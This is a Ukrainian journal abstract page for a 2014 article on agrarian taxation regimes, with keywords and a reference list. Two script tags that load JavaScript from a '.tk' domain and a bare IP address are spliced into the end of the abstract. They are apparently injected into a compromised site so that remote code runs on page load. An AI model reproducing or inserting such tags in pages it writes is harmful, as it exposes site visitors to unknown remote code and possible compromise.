ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 654.446:338.432
Аграрна політика і реформування

Оподаткування аграрного сектору: ризики та розвиток / Проскура К. П. // Економіка АПК. - 2014. - № 2 - С. 29

Розглянуто варіанти зміни режиму оподаткування аграрних підприємств, а також недоліки та переваги діючого режиму оподаткування аграрних підприємств. Зроблено висновок про невідповідність напрямів економічного і соціального розвитку аграрної сфери, що в кінцевому підсумку призводить до зменшення рівня зайнятості на селі та зростання диференціації доходів жителів міста і села. Акцентовано увагу на фіскальній неефективності чинного аграрного оподаткування. Здійснено порівняння податкового навантаження на аграрний бізнес в Україні з аналогічними показниками в країнах ЄС, Росії та США і зроблено висновок про практично повну відсутність податкового навантаження на аграрний бізнес в Україні. Запропоновано кілька різних варіантів режимів оподаткування сільськогосподарських підприємств: переоцінка землі та включення індексації в існуючий механізм оподаткування фіксованого сільськогосподарського податку, введення податку з обсягу продажів, перехід на звичайну систему оподаткування (сплати податку на прибуток на загальних підставах) для агрохолдингів і податку, аналогічного земельному, для решти, введення диференційованих ставок ПДВ. Розглянуто економічні, соціальні та фіскальні ризики впровадження пропонованих податкових режимів. Зроблено прогнозні оцінки величин надходження при різних варіантах оподаткування на 2015 рік. Табл.: 1. Рис.: 3. Бібліогр.: 14.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: фермери, фіксований сільськогосподарський податок, звичайна система, фіскальні ризики, податок на дохід, соціальні платежі

Список використаних джерел

 1. Atkinson E.B., Stiglits D.E. Economic Theory’s of State SectorLections. – М.: Аspect Press, 1995. – 831 p.
 2. Borodina O.М., Geits V.М., Gutorov А.О. and others. Ukrainian Model og Agrarian Development and Its Socioeconomic Re-orientation: science report; [under reduction V.М. Geits, О.М. Borodina, І.V. Prokopa]. – К.: Institute of Economic and prediction. NSA of Ukraine, 2012. – 56 p.
 3. Verkhovna Rada of Ukraine Law of Ukraine «State Budget of Ukraine 2013 » // Кyiv: Bulletin of Verkhovna Rada of Ukraine, – 2013, – № 5-6. – P. 60.
 4. Verkhovna Rada of Ukraine «Economic Codex of Ukraine» // Kyiv: Bulletin of Verkhovna Rada of Ukraine, 2003, № 18, № 19-20, № 21-22. – P.144.
 5. Zalizko V.D. Agroholdingization Agricultural Enterprises Impact on Social-Economic Development of Rural Territories // Кyiv: Economic Of Ukraine – 2013. – 6 (619). – P. 71-79.
 6. Karsetskaia E. United Agricultural Tax in RF // Moscow: АКDI Economic and Life. – 2013. [Regime of access] Online: http://www.akdi.ru/nalog/pr_news/59.htm.
 7. Lupenko U.О., Kropyvko M.F. Agroholdings in Ukraine and Strengthening of Social Direction of Their Activity // Кyiv: Еconomic of Agroindustrial Complex. – 2013. – № 7. – P. 5-21.
 8. Pashaver B.I. Concentration and Effectiveness of Agricultural economy // Кyiv: Еconomic of Agroindustrial Complex. – 2013. – № 1. – P. 16-23.
 9. Verkhovna Rada of Ukraine «Tax Codex of Ukraine» Bulletin of Verkhovna Rada of Ukraine, 2011, № 13-14, № 15-16, № 17, p.112
 10. Skripnik А.V., Proskura Е.P. Special Function of Taxation Administration // Іrpin: Science Bulletin of National University of State Tax Office of Ukraine. – 2013. – №1(60). – P. 156-164.
 11. Skripnik А., Proskura Е. Fiscal Potential of Agrarian Economic Sector in the Period o Finance Crisis // Іrpin: Bulletin of National University of State Tax Office of Ukraine. – 2010. – №2. – P.157-164.
 12. State Committee of Ukrainian Statistic «Agriculture of Ukraine 2010»: statistical collection – Кyiv: State Statistic of Ukraine, – 2011. – P. 51.
 13. Chopenko V. Tax Haircut for Landowners // Кiev: Mirror Week. Newspaper. Finance. – April 12, 2013. – [Regime of access] Оnline: http://gazeta.zn.ua/finances/nalogovaya-strizhka-dlya-agrariev-_.html
 14. Skrypnyk A. Bukin E. Informational Vector of Ukraine Agrarian sector Development// Slovak Republic, Nitra. Slovak University of Agriculture in Nitra. International Scientific Days 2012. Global Commodity Markets: New Challenges and the Role of Policy, ISBN 97.
Читати статтю: 14_02_29-35.pdf